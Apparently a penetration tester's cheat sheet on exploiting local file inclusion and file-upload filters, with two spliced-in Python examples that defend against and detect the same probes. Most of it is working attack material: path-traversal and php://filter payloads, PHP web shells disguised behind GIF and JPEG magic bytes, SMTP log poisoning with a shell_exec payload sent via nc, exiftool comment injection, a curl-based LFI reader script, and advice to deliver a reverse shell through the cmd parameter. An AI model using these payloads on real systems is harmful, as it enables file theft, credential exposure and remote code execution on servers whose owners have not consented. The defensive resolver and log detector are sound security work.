Try These for Local File Inclusion
http://10.10.10.10/?page=/etc/passw
http://10.10.10.10/?page=../../../../../../../etc/passwd
http://10.10.10.10/?page=php://filter/convert.base64-encode/resource=index
?url=/../../../..//etc/apache2/sites-available/000-default.conf
# View the access log through /proc: the log's file descriptor under /proc/self/fd is a symbolic link with an unpredictable number, so brute-force the number with Intruder
?url=/../../../../proc/self/fd/§num§
File Upload Steps
1) Change the file extension to php or php5
2) Add the content below to the file:
GIF8;
<?php echo exec("cat /etc/passwd"); ?>
or
\0xFF\0xD8\0xFF\0xE0<?php echo exec("cat /etc/passwd"); ?>
3)
4) Try using the wordlist
5) Check /proc/self/environ for LFI
6) <?php echo file_get_contents('/etc/passwd'); ?>
7) While uploading the file, look for Content-Disposition: form-data; name="somename"; filename="filename.jpeg"
In this case, change the filename to filename="../filename.php" to add a path-traversal element
or
filename="..%2ffilename.php"
LFI can be exploited in the cookie
# The lang cookie is the vulnerable parameter here
Cookie: lang=../../../../etc/passwd
If the cookie value reaches an include() call in the source code, it is vulnerable to path traversal.
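Added example, not part of the original notes: the defensive counterpart to the include() problem above, written in Python rather than PHP so it runs stand-alone. The page selector is mapped through an allowlist and the resolved path is confined to the templates directory after symlinks are followed, so the cookie payload, the php://filter wrapper and /proc/self/environ are all refused; unsafe_resolve shows what the naive join does with the same input. The directory, page names and probe strings are constructed for the example.

```python
import os
import tempfile
from typing import Optional

# Allowlist of page selectors the application is willing to include.
# (Constructed for this example; a real app lists its own templates.)
ALLOWED_PAGES = {"index", "about", "contact"}

# Stream wrappers and remote schemes never belong in a page selector; the
# prefix check is case-insensitive so PHP://FILTER is caught as well.
FORBIDDEN_PREFIXES = ("php:", "data:", "phar:", "file:", "expect:", "zip:",
                      "glob:", "http:", "https:", "ftp:")


def unsafe_resolve(base_dir: str, value: str) -> str:
    """The naive join that a bare include($_COOKIE['lang']) amounts to (for contrast)."""
    # os.path.join() lets '..' climb out of base_dir, and an absolute value
    # replaces base_dir entirely; normpath only tidies the result.
    return os.path.normpath(os.path.join(base_dir, value))


def is_safe_page_selector(value: str) -> bool:
    """True only for a short, plain, allowlisted page name."""
    if not value or len(value) > 64 or "\x00" in value:
        return False
    if value.lower().startswith(FORBIDDEN_PREFIXES):
        return False
    if "/" in value or "\\" in value or ".." in value:
        return False
    return value in ALLOWED_PAGES


def resolve_include(base_dir: str, value: str) -> Optional[str]:
    """Map a user-supplied selector to an absolute template path under base_dir, or None."""
    if not is_safe_page_selector(value):
        return None
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, value + ".php"))
    # Defence in depth: even an allowlisted name must still resolve under
    # base_dir once symlinks are followed (a template symlinked elsewhere fails).
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate


def demo() -> dict:
    """Build a throwaway templates directory and run the probe strings from the notes."""
    base = tempfile.mkdtemp(prefix="templates_")
    open(os.path.join(base, "index.php"), "w").close()
    probes = [
        "index",
        "../../../../etc/passwd",
        "php://filter/convert.base64-encode/resource=index",
        "/proc/self/environ",
        "index.php",
    ]
    try:
        # An allowlisted name whose file is a symlink out of the directory.
        os.symlink("/etc/passwd", os.path.join(base, "about.php"))
        probes.append("about")
    except OSError:
        pass  # platform without symlink support: skip that probe
    return {p: resolve_include(base, p) for p in probes}


if __name__ == "__main__":
    for probe, result in demo().items():
        print(f"{probe!r:55} -> {result}")
```

The allowlist is the real control; the realpath confinement only exists so that a future mistake in the allowlist (or a stray symlink in the templates directory) still cannot reach outside it.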
LFI On SMTP
If SMTP (port 25) is available, there is a chance of LFI through log poisoning as well; check for it. Use the following session:
nc VICTIM_IP 25
HELO anyname
MAIL FROM:"fraek <?php echo shell_exec($_GET['cmd']);?>"
RCPT TO: root
DATA
.
Postfix SMTP logs can be found at /var/log/mail. Once you have found an LFI:
//192.168.56.103/turing-bolo/bolo.php?bolo=../../../../var/log/mail&cmd=
URL-encode a PHP or Perl reverse shell and pass it as the value of the cmd parameter, and you get a reverse shell.
LFI to RCE
When you have an LFI on the target but cannot read /var/log/apache2/access.log directly, use the below:
# Send the request to Intruder, add proc/self/fd/§num§ as a payload position and brute-force it with numbers
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../../proc/self/fd/§num§
# Start the attack
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' image.jpg
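Added example, not from the original notes: a Python detector for the probes listed under "Try These for Local File Inclusion", the lang cookie case, and the /proc/self/fd sweep in this section. It URL-decodes each request component until stable (so double encoding does not hide ../), tags traversal, PHP stream wrappers, /proc/self paths and sensitive file names, and flags a source address that walks through several distinct fd numbers, which is what an Intruder run against /proc/self/fd looks like in the log. The log lines are constructed samples in common log format, not real traffic.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?page=about HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?page=../../../../../../../etc/passwd HTTP/1.1" 200 1423
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?page=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 9811
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1423
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?url=/../../../../proc/self/fd/1 HTTP/1.1" 200 0
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?url=/../../../../proc/self/fd/2 HTTP/1.1" 200 0
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /?url=/../../../../proc/self/fd/3 HTTP/1.1" 200 0
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /?url=/../../../../proc/self/environ HTTP/1.1" 200 3300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
WRAPPER_RE = re.compile(r"(?:php|data|phar|expect|zip|glob|file)://")
FD_RE = re.compile(r"/proc/self/fd/(\d+)")
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/proc/self/environ", "/var/log/", "sites-available")


def normalize(value: str) -> str:
    """URL-decode until stable (catches double encoding), lowercase, unify slashes."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.lower().replace("\\", "/")


def classify(value: str) -> set:
    """Tag one request component (path+query, cookie value, header) with LFI indicators."""
    v = normalize(value)
    tags = set()
    if "../" in v or v.startswith("/etc/") or v.startswith("/proc/"):
        tags.add("traversal")
    if WRAPPER_RE.search(v):
        tags.add("php_wrapper")
    if FD_RE.search(v):
        tags.add("proc_self_fd")
    if any(s in v for s in SENSITIVE):
        tags.add("sensitive_file")
    if "\x00" in v:
        tags.add("null_byte")
    return tags


def classify_cookie_header(header: str) -> dict:
    """Run the same checks over every cookie value (the lang=../.. case from the notes)."""
    findings = {}
    for part in header.split(";"):
        if "=" not in part:
            continue
        name, _, val = part.strip().partition("=")
        tags = classify(val)
        if tags:
            findings[name] = tags
    return findings


def analyze_log(text: str, fd_threshold: int = 3) -> dict:
    """Per source IP: union of tags, distinct /proc/self/fd numbers seen, brute-force flag."""
    per_ip = defaultdict(lambda: {"tags": set(), "fd_numbers": set(), "hits": 0})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m.group("target"))
        if not tags:
            continue  # benign request: not recorded
        entry = per_ip[m.group("ip")]
        entry["tags"] |= tags
        entry["hits"] += 1
        fd = FD_RE.search(normalize(m.group("target")))
        if fd:
            entry["fd_numbers"].add(int(fd.group(1)))
    for entry in per_ip.values():
        # Several distinct descriptor numbers from one source is the sweep pattern.
        entry["fd_bruteforce"] = len(entry["fd_numbers"]) >= fd_threshold
    return dict(per_ip)


if __name__ == "__main__":
    for ip, entry in analyze_log(SAMPLE_LOG).items():
        print(ip, sorted(entry["tags"]), sorted(entry["fd_numbers"]), entry["fd_bruteforce"])
    print(classify_cookie_header("lang=../../../../etc/passwd; sid=abc123"))
```

Access logs only show the request line, so the cookie check has to run where the full request is visible (a WAF, a reverse proxy, or the application itself); the fd sweep, by contrast, is visible in the access log alone and is a good candidate for an alert rule.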
Steps to Perform LFI
1. Intercept the upload request in Burp.
2. Change the Content-Type to image/gif or image/jpeg.
3. Add the file signature (magic numbers) at the start of the file. Example: GIF8;
GIF8;
<?php
echo exec("cat /etc/passwd");
?>
4. Change the file extension to PHP.
5. If .php is blocked, change it to gif.PHP5, php4 or something similar.
6. If none of the above works, try case variations such as PHP, PHP5, PHP4, php5 or php4.
7. Paste your reverse shell at the end of the file, keeping the original file's signature in place.
8. If you are sure there is an RFI/LFI but cannot see the output in the browser, try the same request with curl:
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.227.130/administrator/alerts/alertConfigField.php
#!/bin/bash
# Helper for step 8: reads one file through the LFI. Usage: ./lfi.sh /etc/passwd
_HOST=192.168.100.130
_PATH=administrator/alerts/alertConfigField.php
_PARM=urlConfig
_TRAV=../../../../../../../..
# The sed chain trims the HTML around the included file: strip the 8-space
# indent, keep everything from line 71 onward, then drop the last two lines.
curl -s --data-urlencode "${_PARM}=${_TRAV}$1" "http://${_HOST}/${_PATH}" \
| sed -r 's/^ {8}//' \
| sed '71,$!d' \
| sed '$d' \
| sed '$d'
After Uploading
1. Try to run the uploaded file together with the reverse shell.
2. Intercept the request; if the file is not a reverse shell but just a command executor, e.g.
<?php system($_REQUEST['HackingDream']);?>
--> change the Request Method to POST and
send HackingDream=whoami in the body; you will get the output in the response.